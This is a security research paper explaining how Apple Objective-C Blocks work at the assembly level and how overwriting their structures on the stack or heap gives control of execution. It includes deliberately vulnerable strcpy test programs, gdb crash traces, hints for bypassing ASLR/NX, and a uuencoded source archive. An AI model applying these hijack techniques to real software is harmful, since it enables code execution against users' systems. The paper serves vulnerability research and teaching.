The value 0x7 is stored in a stack variable to be referenced by the Block.
This it the "multiplier" variable.

       mov        dword [ss:rbp-0x50+var_12], 0x7

Ok now we come to the meat of the Block implementation. As you will see,
there's a little bit of code here, much more than expected. Before we
continue tracing it we need to understand a little bit more about Block
internals.

The free chapter from the book Advanced Mac OS X Programming: The Big Nerd
Ranch Guide [5] has a really nice write up on the internals of Blocks which
makes this next bit really clear.

Basically there are two structures defined for every Block created, the
block_descriptor and block_literal as well as the function containing the
actual byte-code implementation of the Block.

The block literal structure is the most important structure for us to
understand. Majority of the assembly listing we are tracing is used to
populate this structure appropriately. The definition for the structure is
shown below:

        struct block_literal_NAME {
            void *isa;
            int flags;
            int reserved;
            void (*invoke)(void *literal, ...);
            struct block_descriptor_NAME *descriptor;
            /* referenced captured variables follow */
        };

Basically, the use of this structure is to turn our Block into a pseudo
objective-c object. As you can see the typical 'isa' pointer at offset 0
contains a pointer to the base class struct for the object.

In the listing below, we can see that the block_literal struct is being
created at offset rbp-0x50+var_16. The ISA pointer is populated with a
pointer to the class "NSConcreteStackBlock".

       lea        rax, qword [ss:rbp-0x50+var_16]
       mov        rcx, qword [ds:imp___got___NSConcreteStackBlock]
       lea        rcx, qword [ds:rcx]
       mov        qword [ss:rbp-0x50+var_16], rcx

As described in [5], this class indicates that the Block is to be stored on
the stack. Other possible alternative base classes are:
NSConcreteGlobalBlock for global Blocks, NSConcreteMallocBlock for heap
based Blocks, NSConcreteAutoBlock for Blocks affected by garbage collection
and NSConcreteFinalizingBlock for blocks which have a
"finalizer"/destructor which must be run apon garbage collection. Cross
referencing these class structs can give us a pretty good indication where
Blocks are used in a binary, and also their location in memory at runtime.

       mov        dword [ss:rbp-0x50+var_24], 0x40000000

The next element populated is the flags. I won't go into this too much
because the write-up at [5] covers it perfectly. The flags enum stores some
meta information about the Block including garbage collection settings and
whether or not the Block is global.

Next the reserved field is set to 0.

       mov        dword [ss:rbp-0x50+var_28], 0x0

The main_block_invoke_1 function is the invoke() method for this Block. It
basically contains the compiled instructions for the block itself. As you
will see it is called later when the Block is executed.

       lea        rcx, qword [ds:___main_block_invoke_1]
       mov        qword [ss:rbp-0x50+var_32], rcx

Earlier we discussed the fact that there are two structures for every
Block. The second of these, the block descriptor is pre-created at compile
time and stored in the __data section.

       lea        rcx, qword [ds:___block_descriptor_tmp_1.1]
       mov        qword [ss:rbp-0x50+var_40], rcx

The struct definition is as follows:

        static const struct block_descriptor_NAME {
            unsigned long reserved;
            unsigned long literal_size;

            /* helper functions - present only if needed */
            void (*copy_helper)(void *dst, void *src);
            void (*dispose_helper)(void *src);
        };

Basically the only field we care about most of the time is the
literal_size, which contains the total size of the block_literal. The other
function pointers are only used in specific cases.

The rest of the block literal struct contains the arguments to invoke.
A copy of the "multiplier" variable is copied into this struct.

       mov        ecx, dword [ss:rbp-0x50+var_12]
       mov        dword [ss:rbp-0x50+var_48], ecx

Now that the literal struct is populated, the code has to invoke the Block
passing in the arguments. This is done by retrieving the invoke function
pointer from the literal struct populated earlier.

I probably should have used an optimization flag when i compiled this,
because the next couple of instructions are a little silly. A pointer to
the block literal struct is moved into var_0, then moved back into rax...

       mov        qword [ss:rbp-0x50+var_0], rax
       mov        rax, qword [ss:rbp-0x50+var_0]

Next the invoke function pointer is moved into rax by dereferencing this
pointer and adding 16 (0x10).

       mov        rax, qword [ds:rax+0x10]

The pointer to the block literal struct is then moved into rcx.

       mov        rcx, qword [ss:rbp-0x50+var_0]

The value being passed to the Block in the printf() call (3) is temporarily
moved to edx.

       mov        edx, 0x3                      ; arg to block

The block_literal struct pointer is moved to rdi, which is the first
argument in the x86_64 function calling convention (rdi,rsi,rcx,rdx).

       mov        rdi, rcx

The function argument (3) is then moved to esi as the second argument.

       mov        esi, edx

Finally the invoke() method is called. invoke(self,3) basically.

       call       rax

The rest of the assembly listing is just a call to printf to display the
result, followed by the epilogue.

       mov        ecx, eax
       xor        dl, dl
       lea        rdi, qword [ds:0x100000f2c]   ; "%d\\n"
       mov        esi, ecx
       mov        al, dl
       call       imp___stubs__printf
       mov        eax, dword [ss:rbp-0x50+var_60]
       add        rsp, 0x50
       pop        rbp
       ret

As you can see, this process is fairly straight forward, so now that we
understand it we can look at how to abuse it.

--[ Exploitation

In order to demonstrate exploitation scenarios where these Blocks can be
utilized i will start by modifying the example code to contain a trivial
stack overflow.

int main(int ac, char **av)
{
        int multiplier = 7;
        int (^myBlock)(int) = ^(int num) {

            return num * multiplier;

        };
        char buf[20];
        if(ac != 2) {
                printf("error: need 2nd arg\n");
                exit(1);
        }

        strcpy(buf,av[1]);
        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
}

As you can see, prior to the final printf() a call which copies the first
argument to the program into a small stack buffer, without bounds checking,
is added. I also added an exit(1); call to demonstrate that this program
couldn't necessarily be exploited without utilizing the Block. This also
applies to cases where stack cookies (-fstack-protection) are used.

As we saw in the previous example, the block_literal structure used will be
stored on the stack. Also the myBlock pointer to this structure is stored
on the stack in this case.

So what happens when we overflow the buf array in this case? Let's run it
and see.

-[dcbz@squee:~/code/blocks]$ gcc blockof.c -o of
-[dcbz@squee:~/code/blocks]$ ./of
error: need 2nd arg
-[dcbz@squee:~/code/blocks]$ ./of hello
hello: 21
-[dcbz@squee:~/code/blocks]$ gdb ./of
(gdb) r `perl -e'print "A"x5000'`
Starting program: /Users/dcbz/code/blocks/of `perl -e'print "A"x5000'`

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000100000e4e in main ()

As you can see, running this program with a overly large argument overflows
the stack based buffer and we get an EXC_BAD_ACCESS exception. For some
reason gdb claims that it happened at address 0x0. However if we do some
investigation:

(gdb) x/i $pc
0x100000e4e <main+158>: mov    rax,QWORD PTR [rax+0x10]
(gdb) i r rax
rax            0x4141414141414141        4702111234474983745

We can see that the program is crashing dereferencing the block_literal
struct pointer to retrieve the "invoke" pointer. (based on our previous
understanding of the assembly listing.) This means we have overwritten the
pointer to the block_literal struct with a series of 'A's (0x41). Because
the pointer to the struct lies in front of the struct itself we are unable
to modify the invoke pointer directly. Therefore we are left with a very
similar construct to a C++ vptr dereference. We can exploit this in a very
similar fashion.

The construct is essentially "call [ptr+0x10]", therefore we need to
control memory at a known address in order to place a pointer to our
shellcode, then we can use the address of this pointer minus 16 when we
overwrite the block_literal struct pointer. This will result in execution
flow being redirected to our shellcode. Another solution would be to
replace the value of the invoke pointer with another block's invoke method
or known function. Then utilize an argument mismatch in a favorable way.
Both of these things have been documented numerous times so i'm not going
to go into any more detail on this here. Although i will say, in order to
control memory at a fixed location, a few techniques might be, to use the
shared_region_map_file technique, or disable aslr/nx with posix_spawn for
local issues, or use ROP/heapspray for remote issues.

Now that we've looked at the stack overflow case, let's look at what
happens when the block_literal struct contents are on the heap.

To test this basically we can take the test stack overflow we looked at
earlier, and this time move the destination of the strcpy() call to the
heap.

In order to move the Block to the heap we have to utilize a function in the
runtime architecture. Basically libSystem is linked to the block library:
/usr/lib/system/libsystem_blocks.dylib. This library contains functions for
manipulating and displaying Block information. One of the exported
functions, "Block_copy" is used to create a copy of the block on the heap
and return a pointer to it. This is typically used by functions that need
to return a Block, since returning a pointer to a Block on the functions
stack would be fail when the stack unwinds. The heap Block is then
free()'ed via the Block_release function. To call these functions we need
to include the header file "Block.h".

The Block_copy function checks what type of block is being passed to it. If
the Block was allocated on the heap or .bss it simply returns the Block
rather than making a copy. Otherwise a copy is placed on the heap and a
pointer returned, as you can see in the example code below:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Block.h>

int main(int ac, char **av)
{
        char *buf = malloc(20);
        int multiplier = 7;
        int (^stackBlock)(int) = ^(int num) {

            return num * multiplier;

        };
        int (^myBlock)(int) = Block_copy(stackBlock);
        if(ac != 2) {
                printf("error: need 2nd arg\n");
                exit(1);
        }

        strcpy(buf,av[1]);
        printf("%s: %d\n", buf, myBlock(3));
        exit(1);
}

Now that we have some sample code, let's compile and run it and see where
overflowing it gets us.

-[dcbz@squee:~/code/blocks]$ gcc bh.c -o bh
-[dcbz@squee:~/code/blocks]$ gdb ./bh
(gdb) r hi
Starting program: /Users/dcbz/code/blocks/bh hi
Reading symbols for shared libraries +............................. done
hi: 21

As expected running it with the string hi, prints the usual output, this
time executing via the heap allocated Block. However if we pass a string of
500 'A's...

Program exited with code 01.
(gdb) r `perl -e'print "A"x500'`
Starting program: /Users/dcbz/code/blocks/bh `perl -e'print "A"x500'`

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: 13 at address: 0x0000000000000000
0x0000000100000dc4 in main ()
(gdb) x/i $pc
0x100000dc4 <main+276>: call   rax
(gdb) i r rax
rax            0x4141414141414141       4702111234474983745

As you can see we get a crash again, however this time rather than it
dereferencing the block_literal pointer, we have overwritten the invoke()
method pointer itself and have directly controlled eip.

As you can imagine both these cases are useful when trying to gain control
of an overflow, especially in the case of stack or heap canaries, or an
unreachable return.

--[ Future Research -- Non Pointer ISA

Unfortunately, due to the fact that i'm trying to coordinate this paper
release with my Infiltrate 2015 talk i am probably not going to have time
to fully research this area prior to publication.

Basically in the Objective-C runtime on the arm64 the ISA pointer can
function as a tagged pointer as well. Due to the nature of the address
space there are a significant number of unused bits in the pointer which
contain an interesting amount of meta-data. The write-up at [6] clearly
explains all this. I will leave the bit pattern below just in case you are
interested. I am particularly eager to investigate the has_cxx_dtor
attribute, as well as the sidetable reference counting information.

(LSB)
1       bit     indexed

        0 is raw isa, 1 is non-pointer isa.

1       bit     has_assoc

        Object has or once had an associated reference. Object with no
        associated references can deallocate faster.

1       bit     has_cxx_dtor

        Object has a C++ or ARC destructor. Objects with no destructor can
        deallocate faster.

30      bits    shiftcls

        Class pointer's non-zero bits.

9       bits    magic

        Equals 0xd2. Used by the debugger to distinguish real objects from
        uninitialized junk.

1       bit     weakly_referenced

        Object is or once was pointed to by an ARC weak variable. Objects
        not weakly referenced can deallocate faster.

1       bit     deallocating

        Object is currently deallocating.

1       bit     has_sidetable_rc

        Object's retain count is too large to store inline.

19      bits    extra_rc

        Object's retain count above 1. (For example, if extra_rc is 5 then
        the object's real retain count is 6.)
(MSB)

--[ Conclusion

Well you made it to the end reader. Hopefully this was useful in some way!
Writing is very painful...

Thanks for reading!

- nemo

--[ References

[1] The Objective-C Runtime: Understanding and Abusing -
        http://phrack.org/issues/66/4.html
[2] Abusing Performance Optimization Weaknesses to Bypass ASLR -
        http://www.cc.gatech.edu/~blee303/paper/BH_ASLR_slides.pdf
[3] - Lets build tagged pointers:
        https://www.mikeash.com/pyblog/ \
        friday-qa-2012-07-27-lets-build-tagged-pointers.html
[4] Apple Block Conceptual -
        http://developer.apple.com/library/ios/#documentation/cocoa/ \
        Conceptual/Blocks/Articles/bxOverview.html#//apple_ref/doc/uid/ \
        TP40007502-CH3-SW1
[5] Big Nerd Ranch Advanced Mac OS X Programming: Block -
        http://www.informit.com/articles/article.aspx?p=1749598&seqNum=12
[6] Non-pointer ISA
        http://www.sealiesoftware.com/blog/archive/2013/09/24/ \
        objc_explain_Non-pointer_isa.html

--[ Appendix - Source Code

begin 644 code.tgz
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
/P<'!\<OB?]V9SVT`4```
`
end